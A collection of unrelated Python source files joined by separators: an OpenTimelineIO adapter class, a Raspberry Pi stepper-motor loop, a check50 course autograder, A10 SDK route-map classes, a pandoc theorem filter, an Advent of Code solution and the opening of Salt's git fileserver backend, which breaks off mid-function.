# and its affiliates, except as required to comply with Section 4(c) of
# the License and to reproduce the content of the NOTICE file.
#
# You may obtain a copy of the Apache License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Apache License with the above modification is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the Apache License for the specific
# language governing permissions and limitations under the Apache License.
#
"""Implementation of the OTIO internal `Adapter` system.
For information on writing adapters, please consult:
https://opentimelineio.readthedocs.io/en/latest/tutorials/write-an-adapter.html# # noqa
"""
import inspect
import collections
from .. import (
core,
plugins,
media_linker,
hooks,
)
@core.register_type
class Adapter(plugins.PythonPlugin):
"""Adapters convert between OTIO and other formats.
Note that this class is not subclassed by adapters. Rather, an adapter is
a python module that implements at least one of the following functions:
write_to_string(input_otio)
write_to_file(input_otio, filepath) (optionally inferred)
read_from_string(input_str)
read_from_file(filepath) (optionally inferred)
...as well as a small json file that advertises the features of the adapter
to OTIO. This class serves as the wrapper around these modules internal
to OTIO. You should not need to extend this class to create new adapters
for OTIO.
For more information:
https://opentimelineio.readthedocs.io/en/latest/tutorials/write-an-adapter.html# # noqa
"""
_serializable_label = "Adapter.1"
def __init__(
self,
name=None,
execution_scope=None,
filepath=None,
suffixes=None
):
plugins.PythonPlugin.__init__(
self,
name,
execution_scope,
filepath
)
self.suffixes = suffixes or []
suffixes = core.serializable_field(
"suffixes",
type([]),
doc="File suffixes associated with this adapter."
)
def has_feature(self, feature_string):
"""
return true if adapter supports feature_string, which must be a key
of the _FEATURE_MAP dictionary.
Will trigger a call to self.module(), which imports the plugin.
"""
if feature_string.lower() not in _FEATURE_MAP:
return False
search_strs = _FEATURE_MAP[feature_string]
try:
return any(hasattr(self.module(), s) for s in search_strs)
except ImportError:
# @TODO: should issue a warning that the plugin was not importable?
return False
def read_from_file(
self,
filepath,
media_linker_name=media_linker.MediaLinkingPolicy.ForceDefaultLinker,
media_linker_argument_map=None,
hook_function_argument_map={},
**adapter_argument_map
):
"""Execute the read_from_file function on this adapter.
If read_from_string exists, but not read_from_file, execute that with
a trivial file object wrapper.
"""
if media_linker_argument_map is None:
media_linker_argument_map = {}
result = None
if (
not self.has_feature("read_from_file") and
self.has_feature("read_from_string")
):
with open(filepath, 'r') as fo:
contents = fo.read()
result = self._execute_function(
"read_from_string",
input_str=contents,
**adapter_argument_map
)
else:
result = self._execute_function(
"read_from_file",
filepath=filepath,
**adapter_argument_map
)
hook_function_argument_map['adapter_arguments'] = adapter_argument_map
hook_function_argument_map['media_linker_argument_map'] = \
media_linker_argument_map
result = hooks.run("post_adapter_read", result,
extra_args=hook_function_argument_map)
if media_linker_name and (
media_linker_name != media_linker.MediaLinkingPolicy.DoNotLinkMedia
):
_with_linked_media_references(
result,
media_linker_name,
media_linker_argument_map
)
result = hooks.run("post_media_linker", result,
extra_args=media_linker_argument_map)
return result
def write_to_file(
self,
input_otio,
filepath,
hook_function_argument_map={},
**adapter_argument_map
):
"""Execute the write_to_file function on this adapter.
If write_to_string exists, but not write_to_file, execute that with
a trivial file object wrapper.
"""
hook_function_argument_map['adapter_arguments'] = adapter_argument_map
input_otio = hooks.run("pre_adapter_write", input_otio,
extra_args=hook_function_argument_map)
if (
not self.has_feature("write_to_file") and
self.has_feature("write_to_string")
):
result = self.write_to_string(input_otio, **adapter_argument_map)
with open(filepath, 'w') as fo:
fo.write(result)
return filepath
return self._execute_function(
"write_to_file",
input_otio=input_otio,
filepath=filepath,
**adapter_argument_map
)
def read_from_string(
self,
input_str,
media_linker_name=media_linker.MediaLinkingPolicy.ForceDefaultLinker,
media_linker_argument_map=None,
hook_function_argument_map={},
**adapter_argument_map
):
"""Call the read_from_string function on this adapter."""
result = self._execute_function(
"read_from_string",
input_str=input_str,
**adapter_argument_map
)
hook_function_argument_map['adapter_arguments'] = adapter_argument_map
hook_function_argument_map['media_linker_argument_map'] = \
media_linker_argument_map
result = hooks.run("post_adapter_read", result,
extra_args=hook_function_argument_map)
if media_linker_name and (
media_linker_name != media_linker.MediaLinkingPolicy.DoNotLinkMedia
):
_with_linked_media_references(
result,
media_linker_name,
media_linker_argument_map
)
# @TODO: Should this run *ONLY* if the media linker ran?
result = hooks.run("post_media_linker", result,
extra_args=hook_function_argument_map)
return result
def write_to_string(
self,
input_otio,
hook_function_argument_map={},
**adapter_argument_map
):
"""Call the write_to_string function on this adapter."""
hook_function_argument_map['adapter_arguments'] = adapter_argument_map
input_otio = hooks.run("pre_adapter_write", input_otio,
extra_args=hook_function_argument_map)
return self._execute_function(
"write_to_string",
input_otio=input_otio,
**adapter_argument_map
)
def __str__(self):
return (
"Adapter("
"{}, "
"{}, "
"{}, "
"{}"
")".format(
repr(self.name),
repr(self.execution_scope),
repr(self.filepath),
repr(self.suffixes),
)
)
def __repr__(self):
return (
"otio.adapter.Adapter("
"name={}, "
"execution_scope={}, "
"filepath={}, "
"suffixes={}"
")".format(
repr(self.name),
repr(self.execution_scope),
repr(self.filepath),
repr(self.suffixes),
)
)
def plugin_info_map(self):
"""Adds extra adapter-specific information to call to the parent fn."""
result = super(Adapter, self).plugin_info_map()
features = collections.OrderedDict()
result["supported features"] = features
for feature in sorted(_FEATURE_MAP.keys()):
if feature in ["read", "write"]:
continue
if self.has_feature(feature):
features[feature] = collections.OrderedDict()
# find the function
args = []
for fn_name in _FEATURE_MAP[feature]:
if hasattr(self.module(), fn_name):
fn = getattr(self.module(), fn_name)
args = inspect.getargspec(fn)
docs = inspect.getdoc(fn)
break
if args:
features[feature]["args"] = args.args
features[feature]["doc"] = docs
return result
def _with_linked_media_references(
read_otio,
media_linker_name,
media_linker_argument_map
):
"""Link media references in the read_otio if possible.
Makes changes in place and returns the read_otio structure back.
"""
if not read_otio or not media_linker.from_name(media_linker_name):
return read_otio
# not every object the adapter reads has an "each_clip" method, so this
# skips objects without one.
clpfn = getattr(read_otio, "each_clip", None)
if clpfn is None:
return read_otio
for cl in read_otio.each_clip():
new_mr = media_linker.linked_media_reference(
cl,
media_linker_name,
# @TODO: should any context get wired in at this point?
media_linker_argument_map
)
if new_mr is not None:
cl.media_reference = new_mr
return read_otio
# map of attr to look for vs feature name in the adapter plugin
_FEATURE_MAP = {
'read_from_file': ['read_from_file'],
'read_from_string': ['read_from_string'],
'read': ['read_from_file', 'read_from_string'],
'write_to_file': ['write_to_file'],
'write_to_string': ['write_to_string'],
'write': ['write_to_file', 'write_to_string']
}
|
import RPi.GPIO as GPIO
from time import sleep
# Direction pin from controller
DIR = 10
# Step pin from controller
STEP = 8
# 0/1 used to signify clockwise or counterclockwise.
CW = 1
CCW = 0
# Setup pin layout on PI
GPIO.setmode(GPIO.BOARD)
# Establish Pins in software
GPIO.setup(DIR, GPIO.OUT)
GPIO.setup(STEP, GPIO.OUT)
# Set the first direction you want it to spin
GPIO.output(DIR, CW)
try:
# Run forever.
while True:
"""Change Direction: Changing direction requires time to switch. The
time is dictated by the stepper motor and controller. """
sleep(1.0)
# Esablish the direction you want to go
GPIO.output(DIR,CW)
# Run for 200 steps. This will change based on how you set you controller
for x in range(200):
# Set one coil winding to high
GPIO.output(STEP,GPIO.HIGH)
# Allow it to get there.
sleep(.005) # Dictates how fast stepper motor will run
# Set coil winding to low
GPIO.output(STEP,GPIO.LOW)
sleep(.005) # Dictates how fast stepper motor will run
"""Change Direction: Changing direction requires time to switch. The
time is dictated by the stepper motor and controller. """
sleep(1.0)
GPIO.output(DIR,CCW)
for x in range(200):
GPIO.output(STEP,GPIO.HIGH)
sleep(.005)
GPIO.output(STEP,GPIO.LOW)
sleep(.005)
# Once finished clean everything up
except KeyboardInterrupt:
print("cleanup")
GPIO.cleanup()
|
import check50
import numpy as np
import requests
# random seed generated and then passed to TestBank to prevent cheating
ui32 = np.iinfo(np.uint32)
seed = np.random.randint(1, ui32.max)
params = {'seed': seed, 'solution': True}
r = requests.get('https://testbank.roualdes.us/ey0C', params=params)
sol = r.json()['solutions']
@check50.check()
def exists():
"""uniform.py exists."""
check50.exists("uniform.py")
@check50.check(exists)
def compiles():
"""uniform.py produces correct answer."""
check50.run("python uniform.py {}".format(seed)).stdout(str(sol)+'\n').exit()
|
from a10sdk.common.A10BaseClass import A10BaseClass
class Rt(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param value: {"type": "string", "description": "VPN extended community", "format": "string-rlx"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "rt"
self.DeviceProxy = ""
self.value = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Soo(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param value: {"type": "string", "description": "VPN extended community", "format": "string-rlx"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "soo"
self.DeviceProxy = ""
self.value = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Extcommunity(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "extcommunity"
self.DeviceProxy = ""
self.rt = {}
self.soo = {}
for keys, value in kwargs.items():
setattr(self,keys, value)
class Origin(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param egp: {"default": 0, "not-list": ["igp", "incomplete"], "type": "number", "description": "remote EGP", "format": "flag"}
:param incomplete: {"default": 0, "not-list": ["egp", "igp"], "type": "number", "description": "unknown heritage", "format": "flag"}
:param igp: {"default": 0, "not-list": ["egp", "incomplete"], "type": "number", "description": "local IGP", "format": "flag"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "origin"
self.DeviceProxy = ""
self.egp = ""
self.incomplete = ""
self.igp = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class AggregatorAs(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param ip: {"type": "string", "description": "IP address of aggregator", "format": "ipv4-address"}
:param asn: {"description": "AS number", "minimum": 1, "type": "number", "maximum": 4294967295, "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "aggregator-as"
self.DeviceProxy = ""
self.ip = ""
self.asn = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Aggregator(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "aggregator"
self.DeviceProxy = ""
self.aggregator_as = {}
for keys, value in kwargs.items():
setattr(self,keys, value)
class Weight(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param weight_val: {"description": "Weight value", "minimum": 0, "type": "number", "maximum": 4294967295, "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "weight"
self.DeviceProxy = ""
self.weight_val = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Level(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param value: {"enum": ["level-1", "level-1-2", "level-2"], "type": "string", "description": "'level-1': Export into a level-1 area; 'level-1-2': Export into level-1 and level-2; 'level-2': Export into level-2 sub-domain; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "level"
self.DeviceProxy = ""
self.value = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class NextHop(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param address: {"type": "string", "description": "IP address of next hop", "format": "ipv4-address"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "next-hop"
self.DeviceProxy = ""
self.address = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Ip(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "ip"
self.DeviceProxy = ""
self.next_hop = {}
for keys, value in kwargs.items():
setattr(self,keys, value)
class Metric(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param value: {"minLength": 1, "maxLength": 128, "type": "string", "description": "Metric value", "format": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "metric"
self.DeviceProxy = ""
self.value = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class AsPath(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param num: {"description": "AS number", "minimum": 1, "type": "number", "maximum": 4294967295, "format": "number"}
:param num2: {"description": "AS number", "minimum": 1, "type": "number", "maximum": 4294967295, "format": "number"}
:param prepend: {"type": "string", "description": "Prepend to the as-path (AS number)", "format": "string-rlx"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "as-path"
self.DeviceProxy = ""
self.num = ""
self.num2 = ""
self.prepend = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class CommList(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param name: {"description": "Community-list name", "format": "string", "minLength": 1, "not-list": ["v-std", "v-exp"], "maxLength": 128, "type": "string"}
:param v_std: {"description": "Community-list number (standard)", "format": "number", "not-list": ["v-exp", "name"], "maximum": 99, "minimum": 1, "type": "number"}
:param v_exp_delete: {"default": 0, "type": "number", "description": "Delete matching communities", "format": "flag"}
:param v_exp: {"description": "Community-list number (expanded)", "format": "number", "not-list": ["v-std", "name"], "maximum": 199, "minimum": 100, "type": "number"}
:param name_delete: {"default": 0, "type": "number", "description": "Delete matching communities", "format": "flag"}
:param delete: {"default": 0, "type": "number", "description": "Delete matching communities", "format": "flag"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "comm-list"
self.DeviceProxy = ""
self.name = ""
self.v_std = ""
self.v_exp_delete = ""
self.v_exp = ""
self.name_delete = ""
self.delete = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class LocalPreference(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param val: {"description": "Preference value", "minimum": 0, "type": "number", "maximum": 4294967295, "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "local-preference"
self.DeviceProxy = ""
self.val = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Tag(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param value: {"description": "Tag value", "minimum": 0, "type": "number", "maximum": 4294967295, "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "tag"
self.DeviceProxy = ""
self.value = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Local(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param address: {"type": "string", "description": "IPv6 address of next hop", "format": "ipv6-address"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "local"
self.DeviceProxy = ""
self.address = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class NextHop1(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param address: {"type": "string", "description": "global address of next hop", "format": "ipv6-address"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "next-hop-1"
self.DeviceProxy = ""
self.local = {}
self.address = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Ipv6(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "ipv6"
self.DeviceProxy = ""
self.next_hop_1 = {}
for keys, value in kwargs.items():
setattr(self,keys, value)
class DampeningCfg(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param dampening_max_supress: {"description": "Maximum duration to suppress a stable route(minutes)", "minimum": 1, "type": "number", "maximum": 255, "format": "number"}
:param dampening: {"default": 0, "type": "number", "description": "Enable route-flap dampening", "format": "flag"}
:param dampening_penalty: {"description": "Un-reachability Half-life time for the penalty(minutes)", "minimum": 1, "type": "number", "maximum": 45, "format": "number"}
:param dampening_half_time: {"description": "Reachability Half-life time for the penalty(minutes)", "minimum": 1, "type": "number", "maximum": 45, "format": "number"}
:param dampening_supress: {"description": "Value to start suppressing a route", "minimum": 1, "type": "number", "maximum": 20000, "format": "number"}
:param dampening_reuse: {"description": "Value to start reusing a route", "minimum": 1, "type": "number", "maximum": 20000, "format": "number"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "dampening-cfg"
self.DeviceProxy = ""
self.dampening_max_supress = ""
self.dampening = ""
self.dampening_penalty = ""
self.dampening_half_time = ""
self.dampening_supress = ""
self.dampening_reuse = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class OriginatorId(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param originator_ip: {"type": "string", "description": "IP address of originator", "format": "ipv4-address"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "originator-id"
self.DeviceProxy = ""
self.originator_ip = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class MetricType(A10BaseClass):
"""This class does not support CRUD Operations please use parent.
:param value: {"enum": ["external", "internal", "type-1", "type-2"], "type": "string", "description": "'external': IS-IS external metric type; 'internal': IS-IS internal metric type; 'type-1': OSPF external type 1 metric; 'type-2': OSPF external type 2 metric; ", "format": "enum"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.b_key = "metric-type"
self.DeviceProxy = ""
self.value = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
class Set(A10BaseClass):
"""Class Description::
Set values in destination routing protocol.
Class set supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
:param atomic_aggregate: {"default": 0, "optional": true, "type": "number", "description": "BGP atomic aggregate attribute", "format": "flag"}
:param community: {"optional": true, "type": "string", "description": "BGP community attribute", "format": "string-rlx"}
:param uuid: {"description": "uuid of the object", "format": "string", "minLength": 1, "modify-not-allowed": 1, "optional": true, "maxLength": 64, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/route-map/{tag}+{action}+{sequence}/set`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "set"
self.a10_url="/axapi/v3/route-map/{tag}+{action}+{sequence}/set"
self.DeviceProxy = ""
self.extcommunity = {}
self.origin = {}
self.aggregator = {}
self.weight = {}
self.level = {}
self.ip = {}
self.metric = {}
self.as_path = {}
self.comm_list = {}
self.atomic_aggregate = ""
self.community = ""
self.local_preference = {}
self.tag = {}
self.ipv6 = {}
self.dampening_cfg = {}
self.originator_id = {}
self.metric_type = {}
self.uuid = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
|
#!/usr/bin/env python
"""
Pandoc filter to convert divs with class="theorem" to LaTeX
theorem environments in LaTeX output, and to numbered theorems
in HTML output.
"""
from pandocfilters import toJSONFilter, RawBlock, Div
theoremcount = 0
def latex(x):
return RawBlock('latex',x)
def html(x):
return RawBlock('html', x)
def theorems(key, value, format, meta):
if key == 'Div':
[[ident,classes,kvs], contents] = value
if "theorem" in classes:
if format == "latex":
if ident == "":
label = ""
else:
label = '\\label{' + ident + '}'
return([latex('\\begin{theorem}' + label)] + contents +
[latex('\\end{theorem}')])
elif format == "html" or format == "html5":
global theoremcount
theoremcount = theoremcount + 1
newcontents = [html('<dt>Theorem ' + str(theoremcount) + '</dt>'),
html('<dd>')] + contents + [html('</dd>\n</dl>')]
return Div([ident,classes,kvs], newcontents)
if __name__ == "__main__":
toJSONFilter(theorems)
|
import re
from collections import defaultdict
def day19(fileName):
substitutionRegex = re.compile(r"(.+) => (.+)")
substitutions = defaultdict(list)
with open(fileName) as infile:
for inputLine in (line.strip() for line in infile):
match = substitutionRegex.match(inputLine)
if match:
substitutions[match[1]].append(match[2])
continue
if len(inputLine) > 0:
molecule = inputLine
newMolecules = set()
for substituted in substitutions:
foundPosition = 0
lastSubstitutedLength = 0
for _ in range(molecule.count(substituted)):
searchPosition = foundPosition + lastSubstitutedLength
lastSubstitutedLength = len(substituted)
foundPosition = molecule.find(substituted, searchPosition)
for sub in substitutions[substituted]:
newMolecule = f"{molecule[:foundPosition]}{sub}{molecule[foundPosition + lastSubstitutedLength:]}"
newMolecules.add(newMolecule)
return newMolecules
molecules = day19("19.txt")
print(len(molecules))
|
# -*- coding: utf-8 -*-
'''
Git Fileserver Backend
With this backend, branches and tags in a remote git repository are exposed to
salt as different environments.
To enable, add ``git`` to the :conf_master:`fileserver_backend` option in the
master config file.
As of the :strong:`Helium` release, the Git fileserver backend will support
both `GitPython`_ and `pygit2`_, with pygit2 being preferred if both are
present. An optional master config parameter (:conf_master:`gitfs_provider`)
can be used to specify which provider should be used.
.. note:: Minimum requirements
Using `GitPython`_ requires a minimum GitPython version of 0.3.0, as well as
git itself.
Using `pygit2`_ requires a minimum pygit2 version of 0.19.0. Additionally,
using pygit2 as a provider requires `libgit2`_ 0.19.0 or newer, as well as
git itself. pygit2 and libgit2 are developed alongside one another, so it
is recommended to keep them both at the same major release to avoid
unexpected behavior.
.. warning::
`pygit2`_ does not yet support supplying passing SSH credentials, so at
this time only ``http://``, ``https://``, and ``file://`` URIs are
supported as valid :conf_master:`gitfs_remotes` entries if pygit2 is being
used.
Additionally, `pygit2`_ does not yet support passing http/https credentials
via a `.netrc`_ file.
.. _GitPython: https://github.com/gitpython-developers/GitPython
.. _pygit2: https://github.com/libgit2/pygit2
.. _libgit2: https://github.com/libgit2/pygit2#quick-install-guide
.. _.netrc: https://www.gnu.org/software/inetutils/manual/html_node/The-_002enetrc-File.html
'''
# Import python libs
import distutils.version # pylint: disable=E0611
import glob
import hashlib
import logging
import os
import re
import shutil
import subprocess
import time
VALID_PROVIDERS = ('gitpython', 'pygit2')
PYGIT2_TRANSPORTS = ('http', 'https', 'file')
# Import salt libs
import salt.utils
import salt.fileserver
from salt.exceptions import SaltException
from salt.utils.event import tagify
# Import third party libs
HAS_GITPYTHON = False
HAS_PYGIT2 = False
try:
import git
HAS_GITPYTHON = True
except ImportError:
pass
try:
import pygit2
HAS_PYGIT2 = True
except ImportError:
pass
log = logging.getLogger(__name__)
# Define the module's virtual name
__virtualname__ = 'git'
def _verify_gitpython(quiet=False):
'''
Check if GitPython is available and at a compatible version (>= 0.3.0)
'''
recommend_pygit2 = (
'pygit2 is installed, you may wish to set gitfs_provider to '
'\'pygit2\' in the master config file to use pygit2 for '
'gitfs support.'
)
if not HAS_GITPYTHON:
log.error(
'Git fileserver backend is enabled in master config file, but '
'could not be loaded, is GitPython installed?'
)
if HAS_PYGIT2 and not quiet:
log.error(recommend_pygit2)
return False
gitver = distutils.version.LooseVersion(git.__version__)
minver_str = '0.3.0'
minver = distutils.version.LooseVersion(minver_str)
errors = []
if gitver < minver:
errors.append(
'Git fileserver backend is enabled in master config file, but '
'the GitPython version is earlier than {0}. Version {1} '
'detected.'.format(minver_str, git.__version__)
)
if errors:
if HAS_PYGIT2 and not quiet:
errors.append(recommend_pygit2)
for error in errors:
log.error(error)
return False
log.info('gitpython gitfs_provider enabled')
__opts__['verified_gitfs_provider'] = 'gitpython'
return True
def _verify_pygit2(quiet=False):
'''
Check if pygit2/libgit2 are available and at a compatible version. Both
must be at least 0.19.0.
'''
recommend_gitpython = (
'GitPython is installed, you may wish to set gitfs_provider to '
'\'gitpython\' in the master config file to use GitPython for '
'gitfs support.'
)
if not HAS_PYGIT2:
log.error(
'Git fileserver backend is enabled in master config file, but '
'could not be loaded, are pygit2 and libgit2 installed?'
)
if HAS_GITPYTHON and not quiet:
log.error(recommend_gitpython)
return False
pygit2ver = distutils.version.LooseVersion(pygit2.__version__)
libgit2ver = distutils.version.LooseVersion(pygit2.LIBGIT2_VERSION)
minver_str = '0.19.0'
minver = distutils.version.LooseVersion(minver_str)
errors = []
if pygit2ver < minver:
errors.append(
'Git fileserver backend is enabled in master config file, but '
'pygit2 version is earlier than {0}. Version {1} detected.'
.format(minver_str, pygit2.__version__)
)
if libgit2ver < minver:
errors.append(
'Git fileserver backend is enabled in master config file, but '
'libgit2 version is earlier than {0}. Version {1} detected.'
.format(minver_str, pygit2.__version__)
)
if not salt.utils.which('git'):
errors.append(
'The git command line utility is required by the Git fileserver '
'backend when using the \'pygit2\' provider.'
)
if errors:
if HAS_GITPYTHON and not quiet:
errors.append(recommend_gitpython)
for error in errors:
log.error(error)
return False
log.info('pygit2 gitfs_provider enabled')
__opts__['verified_gitfs_provider'] = 'pygit2'
return True
def _get_provider():
'''
Determin which gitfs_provider to use
'''
# Don't re-perform all the verification if we already have a verified
# provider
if 'verified_gitfs_provider' in __opts__:
return __opts__['verified_gitfs_provider']
provider = __opts__.get('gitfs_provider', '').lower()
if not provider:
# Prefer pygit2 if it's available and verified
if _verify_pygit2(quiet=True):
return 'pygit2'
elif _verify_gitpython(quiet=True):
return 'gitpython'
else:
log.error(
'No suitable versions of pygit2/libgit2 or GitPython is '
'installed.'
)
else:
if provider not in VALID_PROVIDERS:
raise SaltException(
'Invalid gitfs_provider {0!r}. Valid choices are: {1}'
.format(provider, VALID_PROVIDERS)
)
elif provider == 'pygit2' and _verify_pygit2():
return 'pygit2'
elif provider == 'gitpython' and _verify_gitpython():
return 'gitpython'
return ''
def __virtual__():
'''
Only load if the desired provider module is present and gitfs is enabled
properly in the master config file.
'''
if not isinstance(__opts__['gitfs_remotes'], list):
return False
if not isinstance(__opts__['gitfs_root'], str):
return False
if not __virtualname__ in __opts__['fileserver_backend']:
return False
provider = _get_provider()
return __virtualname__ if provider else False
def _get_ref_gitpython(repo, short):
'''
Return the ref if found, otherwise return False
'''
for ref in repo.refs:
if isinstance(ref, (git.RemoteReference, git.TagReference)):
parted = ref.name.partition('/')
refname = parted[2] if parted[2] else parted[0]
if short == refname:
return ref
return False
def _get_ref_pygit2(repo, short):
'''
Return the ref if found, otherwise return False
'''
for ref in repo.listall_references():
_, rtype, rspec = ref.split('/', 2)
if rtype in ('remotes', 'tags'):
parted = rspec.partition('/')
refname = parted[2] if parted[2] else parted[0]
if short == refname:
return repo.lookup_reference(ref)
return False
def _wait_lock(lk_fn, dest):
'''
If the write lock is there, check to see if the file is actually being
written. If there is no change in the file size after a short sleep,
remove the lock and move forward.
'''
if not os.path.isfile(lk_fn):
return False
if not os.path.isfile(dest):
# The dest is not here, sleep for a bit, if the dest is not here yet
# kill the lockfile and start the write
time.sleep(1)
if not os.path.isfile(dest):
try:
os.remove(lk_fn)
except (OSError, IOError):
pass
return False
# There is a lock file, the dest is there, stat the dest, sleep and check
# that the dest is being written, if it is not being written kill the lock
# file and continue. Also check if the lock file is gone.
s_count = 0
s_size = os.stat(dest).st_size
while True:
time.sleep(1)
if not os.path.isfile(lk_fn):
return False
size = os.stat(dest).st_size
if size == s_size:
s_count += 1
if s_count >= 3:
# The file is not being written to, kill the lock and proceed
try:
os.remove(lk_fn)
except (OSError, IOError):
pass
return False
else:
s_size = size
return False
def _stale_refs_pygit2(repo):
'''
Return a list of stale refs by running git remote prune --dry-run <remote>,
since libgit2 can't do this.
'''
remote = repo.remotes[0].name
key = ' * [would prune] '
ret = []
for line in subprocess.Popen(
'git remote prune --dry-run {0!r}'.format(remote),
shell=True,
close_fds=True,
cwd=repo.workdir,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT).communicate()[0].splitlines():
if line.startswith(key):
line = line.replace(key, '')
ret.append(line)
return ret
def init():
'''
Return the git repo object for this session
'''
bp_ = os.path.join(__opts__['cachedir'], 'gitfs')
provider = _get_provider()
repos = []
for _, opt in enumerate(__opts__['gitfs_remotes']):
if provider == 'pygit2':
transport, _, uri = opt.partition('://')
if not uri:
log.error('Invalid gitfs remote {0!r}'.format(opt))
continue
elif transport.lower() not in PYGIT2_TRANSPORTS:
log.error(
'Invalid transport {0!r} in gitfs remote {1!r}. Valid '
'transports for pygit2 provider: {2}'
.format(transport, opt, ', '.join(PYGIT2_TRANSPORTS))
)
continue
repo_hash = hashlib.md5(opt).hexdigest()
rp_ = os.path.join(bp_, repo_hash)
if not os.path.isdir(rp_):
os.makedirs(rp_)
try:
if provider == 'gitpython':
if not os.listdir(rp_):
repo = git.Repo.init(rp_)
else:
try:
repo = git.Repo(rp_)
except git.exc.InvalidGitRepositoryError:
log.error(
